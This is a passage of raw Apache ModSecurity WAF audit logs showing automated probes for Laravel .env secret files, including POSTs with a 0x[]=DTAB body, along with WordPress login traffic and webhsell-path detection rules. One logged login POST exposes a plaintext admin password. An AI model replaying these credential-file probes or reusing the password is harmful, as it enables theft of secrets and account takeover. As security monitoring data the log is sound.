p4=0, p5=194, sr=59, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f2971732-Z-- --8f744c0a-A-- [30/Jun/2025:16:32:53.322660 +0530] aGJu3fjour-43Nq0cetnSQAAAFY 192.253.209.63 37319 192.168.74.40 443 --8f744c0a-B-- POST /redmine/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --8f744c0a-C-- 0x%5B%5D=DTAB --8f744c0a-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --8f744c0a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281373144300 178935 (- - -) Stopwatch2: 1751281373144300 178935; combined=2199, p1=406, p2=1340, p3=0, p4=0, p5=453, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f744c0a-Z-- --46dc5a36-A-- [30/Jun/2025:16:32:53.656387 +0530] aGJu2ytJXhRZGlU1BjiMhwAAAAw 45.133.113.189 36343 192.168.74.40 443 --46dc5a36-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --46dc5a36-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1da1ff19-Z-- --f1ff8f12-A-- [30/Jun/2025:16:32:54.630082 +0530] aGJu3nVeW8g-tV0lUXg8_AAAAFQ 192.253.209.62 33301 192.168.74.40 443 --f1ff8f12-B-- GET /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --f1ff8f12-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --f1ff8f12-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281374559808 70442 (- - -) Stopwatch2: 1751281374559808 70442; combined=812, p1=100, p2=516, p3=0, p4=0, p5=196, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f1ff8f12-Z-- --03e1ef09-A-- [30/Jun/2025:16:32:55.373355 +0530] aGJu354tZwI9VhjyFFR7ZAAAAEI 20.171.207.232 33346 192.168.74.40 443 --03e1ef09-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --03e1ef09-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --03e1ef09-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/aainag/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281375359175 14385 (- - -) Stopwatch2: 1751281375359175 14385; combined=2492, p1=128, p2=2245, p3=0, p4=0, p5=118, sr=52, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2bcf497e-Z-- --bc6ba84b-A-- [30/Jun/2025:16:32:56.115968 +0530] aGJu3zI3fPBAC9f2U0qZLgAAADA 192.253.209.97 20859 192.168.74.40 443 --bc6ba84b-B-- POST /docker/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --bc6ba84b-C-- 0x%5B%5D=DTAB --bc6ba84b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --bc6ba84b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281375997612 118994 (- - -) Stopwatch2: 1751281375997612 118994; combined=2106, p1=155, p2=1561, p3=0, p4=0, p5=389, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bc6ba84b-Z-- --b0accc7d-A-- [30/Jun/2025:16:32:56.533659 +0530] aGJu4J4tZwI9VhjyFFR7ZQAAAEI 20.171.207.232 33346 192.168.74.40 443 --b0accc7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b0accc7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b0accc7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b0accc7d-Z-- --d24a9937-A-- [30/Jun/2025:16:32:57.324406 +0530] aGJu4WPCqdxeyafedPa9WgAAAAk 192.253.209.58 35891 192.168.74.40 443 --d24a9937-B-- GET /cms/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --d24a9937-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --d24a9937-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281377276349 48597 (- - -) Stopwatch2: 1751281377276349 48597; combined=1015, p1=152, p2=666, p3=0, p4=0, p5=197, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d24a9937-Z-- --f97a0855-A-- [30/Jun/2025:16:32:57.629713 +0530] aGJu3kX42eYDQRTIrig3OgAAAB0 193.233.210.216 21453 192.168.74.40 443 --f97a0855-B-- POST /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 referer: https://thewizblog.com/wp-login.php content-type: application/x-www-form-urlencoded content-length: 143 accept-encoding: gzip, deflate, br cookie: humans_21909=1; wordpress_test_cookie=WP%20Cookie%20check Host: thewizblog.com Connection: close --f97a0855-C-- log=admin&pwd=Marketingtech%40123%23%24&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fthewizblog.com%2Fwp-admin%2F&testcookie=1 --f97a0855-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ebb1f97e-Z-- --638b3a45-A-- [30/Jun/2025:16:32:58.663018 +0530] aGJu4hcq64WljHnUEmPX9wAAABQ 192.253.209.68 40383 192.168.74.40 443 --638b3a45-B-- POST /cms/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --638b3a45-C-- 0x%5B%5D=DTAB --638b3a45-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --638b3a45-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281378623560 40113 (- - -) Stopwatch2: 1751281378623560 40113; combined=2137, p1=171, p2=1518, p3=0, p4=0, p5=448, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --638b3a45-Z-- --ffd23e27-A-- [30/Jun/2025:16:32:58.827438 +0530] aGJu4p4tZwI9VhjyFFR7ZwAAAEI 20.171.207.232 33346 192.168.74.40 443 --ffd23e27-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --ffd23e27-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ffd23e27-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/js/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2ab9ca72-Z-- --18e75e1b-A-- [30/Jun/2025:16:33:00.085903 +0530] aGJu5MNDEoPcf0uXTmEV9QAAAEc 192.253.209.107 44705 192.168.74.40 443 --18e75e1b-B-- GET /script/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --18e75e1b-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --18e75e1b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281380041947 44289 (- - -) Stopwatch2: 1751281380041947 44289; combined=1147, p1=126, p2=847, p3=0, p4=0, p5=174, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --18e75e1b-Z-- --2ed8ae4b-A-- [30/Jun/2025:16:33:00.989447 +0530] aGJu40X42eYDQRTIrig3OwAAAB0 45.159.23.11 61147 192.168.74.40 443 --2ed8ae4b-B-- GET /wp-login.php HTTP/1.1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203 accept-encoding: gzip, deflate, br cookie: humans_21909=1 Host: thewizblog.com Connection: close --2ed8ae4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-LiteSpeed-Tag: 9c0_L lsc-cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --eee56b0a-Z-- --b73ccb7c-A-- [30/Jun/2025:16:33:01.646697 +0530] aGJu5UX42eYDQRTIrig3PAAAAB0 192.253.209.74 10823 192.168.74.40 443 --b73ccb7c-B-- POST /script/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --b73ccb7c-C-- 0x%5B%5D=DTAB --b73ccb7c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --b73ccb7c-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281381594948 52151 (- - -) Stopwatch2: 1751281381594948 52151; combined=1495, p1=98, p2=988, p3=0, p4=0, p5=409, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b73ccb7c-Z-- --b349337a-A-- [30/Jun/2025:16:33:01.863804 +0530] aGJu5Ams4GQJbNFEXqh5GwAAAFs 205.185.116.195 52503 192.168.74.40 443 --b349337a-B-- GET /wp-login.php HTTP/1.1 Host: laziahomes.com Connection: keep-alive Accept-Encoding: none Accept: */* user-agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 --b349337a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure; HttpOnly Keep-Alive: timeout=5, max=100 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3dc68d48-Z-- --3bdcec57-A-- [30/Jun/2025:16:33:06.384417 +0530] aGJu6p9gn8G79jbwM5vHxwAAAEg 192.253.209.96 44067 192.168.74.40 443 --3bdcec57-B-- GET /application/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --3bdcec57-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3bdcec57-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281386338562 46265 (- - -) Stopwatch2: 1751281386338562 46265; combined=931, p1=112, p2=610, p3=0, p4=0, p5=208, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3bdcec57-Z-- --08af2f4b-A-- [30/Jun/2025:16:33:06.960196 +0530] aGJu6p4tZwI9VhjyFFR7bgAAAEI 20.171.207.232 33346 192.168.74.40 443 --08af2f4b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --08af2f4b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --08af2f4b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/Rajasthan-Folk-Music-Songs.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281386941861 18506 (- - -) Stopwatch2: 1751281386941861 18506; combined=4062, p1=177, p2=3717, p3=0, p4=0, p5=168, sr=69, sw=0, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6b2f5462-Z-- --23313659-A-- [30/Jun/2025:16:33:07.574243 +0530] aGJu67xQl4x4ievr02RreAAAAFw 192.253.209.68 30639 192.168.74.40 443 --23313659-B-- POST /application/.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --23313659-C-- 0x%5B%5D=DTAB --23313659-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --23313659-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281387510574 64032 (- - -) Stopwatch2: 1751281387510574 64032; combined=1526, p1=177, p2=1085, p3=0, p4=0, p5=264, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --23313659-Z-- --80b23163-A-- [30/Jun/2025:16:33:08.151501 +0530] aGJu7J4tZwI9VhjyFFR7bwAAAEI 20.171.207.232 33346 192.168.74.40 443 --80b23163-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Car-Rentals-Agra.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --80b23163-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --80b23163-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/Car-Rentals-Agra.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --65fcc735-Z-- --28504940-A-- [30/Jun/2025:16:33:08.959066 +0530] aGJu7J9gn8G79jbwM5vHyAAAAEg 192.253.209.100 30239 192.168.74.40 443 --28504940-B-- GET /.env.project%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive --28504940-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --28504940-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281388910965 48395 (- - -) Stopwatch2: 1751281388910965 48395; combined=3770, p1=80, p2=3557, p3=0, p4=0, p5=132, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --28504940-Z-- --10609816-A-- [30/Jun/2025:16:33:09.340089 +0530] aGJu7Z4tZwI9VhjyFFR7cAAAAEI 20.171.207.232 33346 192.168.74.40 443 --10609816-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --10609816-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --10609816-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/Rajasthan-Travel-Guides/hotels-bikaner.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity 